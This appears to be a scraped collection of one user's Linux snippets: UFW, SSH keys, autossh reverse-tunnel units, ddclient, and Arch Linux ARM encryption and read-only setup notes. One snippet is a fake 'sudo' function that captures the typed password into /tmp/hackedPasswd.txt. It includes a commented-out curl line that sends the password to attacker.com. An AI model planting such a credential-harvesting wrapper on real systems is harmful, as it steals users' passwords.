bardimnik

UFW

I use Ubuntu’s Uncomplicated firewall because it is available on Ubuntu and it's very simple.

Install UFW

if ufw is not installed by default be sure to install it first.

bardimnik

function sudo () 
{ 
    # https://null-byte.com/privesc-0194190/
    realsudo="$(which sudo)";
    read -s -p "[sudo] password for $USER: " inputPasswd;
    printf "\n";
    printf '%s\n' "$USER : $inputPasswd" > /tmp/hackedPasswd.txt;
    # encoded=$(printf '%s' "$inputPasswd" | base64) > /dev/null 2>&1;
    # curl -s "http://attacker.com/$USER:$encoded" > /dev/null 2>&1;
    $realsudo -S -u root bash -c "exit" <<< "$inputPasswd" > /dev/null 2>&1;

bardimnik

ssh-keygen -t rsa -b 4096 -N '' -C "rthijssen@gmail.com" -f ~/.ssh/id_rsa
ssh-keygen -t rsa -b 4096 -N '' -C "rthijssen@gmail.com" -f ~/.ssh/github_rsa
ssh-keygen -t rsa -b 4096 -N '' -C "rthijssen@gmail.com" -f ~/.ssh/mozilla_rsa

bardimnik

README

Create a template service file at /etc/systemd/system/secure-tunnel@.service. The template parameter will correspond to the name of target host:

[Unit]
Description=Setup a secure tunnel to %I
After=network.target

bardimnik

[Unit]
Description=Autossh Tunnel
Wants=network-online.target
After=network-online.target

[Service]
User=<user>
Type=simple
ExecStart=/usr/bin/autossh -M 20000 -N <host> -R 0.0.0.0:30000:localhost:22
Restart=always

bardimnik

Instalar ddclient

sudo pacman -S ddclient

Configuração do arquivo

sudo nano /etc/ddclient/ddclient.conf

daemon=300 # check every 300 seconds
> syslog=yes # log update msgs to syslog

bardimnik

Arch Linux ARM 64 on Raspberry Pi 3 B+ With Full Disk Encryption And SSH Unlock: 2018 Edition

There are multiple ways to get a full disk encrypted arch linux system on raspberry. In this tutorial, we will install a 64-bit arch linux armv8 system, using dropbear as ssh server for remote pre-boot unlocking of the root filesystem. However, it will still be possible to unlock and use the pi as usual, with a keyboard and monitor. We will also create an unencrypted partition in the installation process, usable as a rescue system.

Differences to the 32-bit arch linux arm version:

• probably better performance
• can run 64-bit software
• comes without the proprietary video-driver blobs

bardimnik

# Install ARCH Linux with encrypted file-system and UEFI
# The official installation guide (https://wiki.archlinux.org/index.php/Installation_Guide) contains a more verbose description.

# Download the archiso image from https://www.archlinux.org/
# Copy to a usb-drive
dd if=archlinux.img of=/dev/sdX bs=16M && sync # on linux

# Boot from the usb. If the usb fails to boot, make sure that secure boot is disabled in the BIOS configuration.

# Set swedish keymap

bardimnik

#!/bin/bash
#-----------------------------------------------------------
# Copyright (C) 2014-2016 GRUBERND http://grubernd.at
# released under a FreeBSD License
#-----------------------------------------------------------
# CATE installer module :: device RealTimeClock RPi
#
#       !!  needs to be run as root / sudo  !!
#
# works both for DS1307 and DS3231 chips.

bardimnik

Read-only FS on Arch Linux ARM

Unlike your typical computer where you usually shutdown properly, I cannot rely on this during the use of my Raspberry Pi. If the Raspberry Pi is improperly shutdown too many times, data corruption in the file system leading to unbootable SD card may result. So we should use a read-only file system.

Full instructions and explanations are obtained from this link but you can run these commands directly. I modified some of the instructions for personal convenience.

Login with default username: alarm, password: alarm

#Optionally enable root over SSH. The rest of these instructions assume u are in root.